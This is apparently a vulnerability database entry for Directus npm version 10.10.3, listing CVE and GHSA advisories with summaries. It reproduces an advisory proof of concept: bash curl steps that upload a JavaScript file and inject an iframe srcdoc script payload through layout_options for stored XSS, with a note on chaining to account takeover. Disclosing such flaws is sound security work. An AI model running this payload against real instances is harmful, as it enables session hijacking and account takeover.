| purl | pkg:npm/directus@10.10.3 |
|---|---|

| Vulnerability | Summary | Fixed by |
|---|---|---|
| VCID-4wtt-tffj-bbeb (Aliases: CVE-2025-30225, GHSA-j8xj-7jff-46mx) | | Affected by 11 other vulnerabilities. |
| VCID-5u8r-s8tz-guhm (Aliases: CVE-2025-55746, GHSA-mv33-9f6j-pfmc) | | Affected by 6 other vulnerabilities. |
| VCID-7fzh-j76t-5kd3 (Aliases: CVE-2025-30351, GHSA-56p6-qw3c-fq2g) | | Affected by 11 other vulnerabilities. |
| VCID-7mea-hn69-wuhu (Aliases: CVE-2025-30353, GHSA-fm3h-p9wm-h74h) | | Affected by 11 other vulnerabilities. |
| VCID-7zt3-dcnm-hqfb (Aliases: CVE-2025-64746, GHSA-9x5g-62gj-wqf2) | Directus has Improper Permission Handling on Deleted Fields. Directus does not properly clean up field-level permissions when a field is deleted. If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access. | Affected by 2 other vulnerabilities. |
| VCID-8uym-xka8-cybb (Aliases: CVE-2024-34709, GHSA-g65h-35f3-x2w3) | | Affected by 25 other vulnerabilities. |
| VCID-anfb-6kfn-a7h7 (Aliases: CVE-2026-26185, GHSA-jr94-gj3h-c8rf) | Directus Vulnerable to User Enumeration via Password Reset Timing Attack. A timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid `reset_url` parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. | Affected by 0 other vulnerabilities. |
| VCID-bh2g-b9dd-d3d9 (Aliases: CVE-2025-53886, GHSA-f24x-rm6g-3w5v) | | Affected by 7 other vulnerabilities. |
| VCID-eb8p-vqjt-yfb8 (Aliases: CVE-2024-34708, GHSA-p8v3-m643-4xqx) | | Affected by 25 other vulnerabilities. |
| VCID-g34r-4mb9-afab (Aliases: CVE-2025-30352, GHSA-7wq3-jr35-275c) | | Affected by 11 other vulnerabilities. |
| VCID-hed8-anm5-ukc9 (Aliases: CVE-2026-22032, GHSA-3573-4c68-g8cc) | Directus has open redirect in SAML. An open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains. | Affected by 1 other vulnerability. |
| VCID-hhwc-1jxe-7yaw (Aliases: CVE-2025-30350, GHSA-rv78-qqrq-73m5) | | Affected by 11 other vulnerabilities. |
| VCID-hpbn-rr29-2yck (Aliases: CVE-2025-53885, GHSA-x3vm-88hf-gpxp) | | Affected by 7 other vulnerabilities. |
| VCID-jjth-fmsp-rfcj (Aliases: CVE-2025-64747, GHSA-vv2v-pw69-8crf) | Directus is Vulnerable to Stored Cross-site Scripting. A stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe `srcdoc` attributes, resulting in persistent XSS execution. | Affected by 2 other vulnerabilities. |
| VCID-kqs7-8txh-jyc8 (Aliases: CVE-2024-6534, GHSA-3fff-gqw3-vj86) | | Affected by 21 other vulnerabilities. |
| VCID-m3wb-sstx-v3d6 (Aliases: CVE-2025-24353, GHSA-pmf4-v838-29hg) | | Affected by 19 other vulnerabilities. |
| VCID-m5ng-dsfx-6qev (Aliases: CVE-2024-54128, GHSA-r6wx-627v-gh2f) | | Affected by 18 other vulnerabilities. Affected by 18 other vulnerabilities. |
| VCID-msb5-197k-a3er (Aliases: CVE-2024-46990, GHSA-68g8-c275-xf2m) | | Affected by 0 other vulnerabilities. Affected by 20 other vulnerabilities. Affected by 21 other vulnerabilities. |
| VCID-na3v-me78-aqcg (Aliases: CVE-2025-64749, GHSA-cph6-524f-3hgr) | Directus Vulnerable to Information Leakage in Existing Collections. An observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases: 1. A user tries to access an existing collection which they are not authorized to access. 2. A user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users who are not authorized to access these collections. | Affected by 2 other vulnerabilities. |
| VCID-nvha-b5tb-dqdt (Aliases: CVE-2025-64748, GHSA-8jpw-gpr4-8cmh) | Directus's conceal fields are searchable if read permissions enabled. A vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. | Affected by 2 other vulnerabilities. |
| VCID-pwt9-krmn-7kdd (Aliases: CVE-2025-53889, GHSA-7cvf-pxgp-42fc) | | Affected by 7 other vulnerabilities. |
| VCID-wgag-36wa-qyay (Aliases: GHSA-9qrm-48qf-r2rw) | Directus has a DOM-Based cross-site scripting (XSS) via `layout_options`. Impact: Directus allows an authenticated attacker to save cross-site scripting code to the database. This is possible because the application injects an attacker-controlled parameter, which is stored on the server and used by the client, into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. PoC: see the advisory PoC reproduced below the table. | Affected by 16 other vulnerabilities. |
| VCID-wn2j-dtpz-hye1 (Aliases: CVE-2025-53887, GHSA-rmjh-cf9q-pv7q) | | Affected by 7 other vulnerabilities. |
| VCID-xc7t-gwaz-ckeu (Aliases: CVE-2024-39896, GHSA-jgf4-vwc3-r46v) | | Affected by 24 other vulnerabilities. |
| VCID-xt9c-32g5-mqes (Aliases: CVE-2024-45596, GHSA-cff8-x7jv-4fm8) | | Affected by 0 other vulnerabilities. Affected by 21 other vulnerabilities. |
| VCID-yutw-33sk-5fg3 (Aliases: GHSA-q83v-hq3j-4pq3) | Duplicate Advisory: Improper access control in Directus | Affected by 22 other vulnerabilities. |
| VCID-yz34-qwam-wbcn (Aliases: CVE-2024-36128, GHSA-632p-p495-25m5) | | Affected by 24 other vulnerabilities. |

### PoC (from GHSA-9qrm-48qf-r2rw, VCID-wgag-36wa-qyay)

To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

1. Upload the following JavaScript file, using the upload functionality at `POST /files`. This PoC will show an alert message.

```bash
export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"

root_dir=$(dirname "$0")
mkdir "${root_dir}/static"

# Log in and store the session cookie
curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
  -c "${root_dir}/static/attacker_directus_session_token" \
  -H 'Content-Type: application/json' \
  -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

# Upload the JavaScript file and keep its file ID
id_url_file=$(echo "alert('Successful DOM-based XSS')" | curl -s -k -X 'POST' "${TARGET_HOST}/files" \
  -b "${root_dir}/static/attacker_directus_session_token" \
  -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")
```

2. Create a preset for a collection and store the preset ID, or use a preset already created from `GET /presets`. The following example uses the `directus_users` preset.

```bash
attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
  -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
  -H 'Content-Type: application/json' \
  -b "${root_dir}/static/attacker_directus_session_token" \
  --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
```

When the user visits the view that uses the `directus_users` preset, the JavaScript file will be executed.

Notes: Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`. We can target any collection that uses the vulnerable template structure that renders the layout option section. In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users, or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.

| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | | |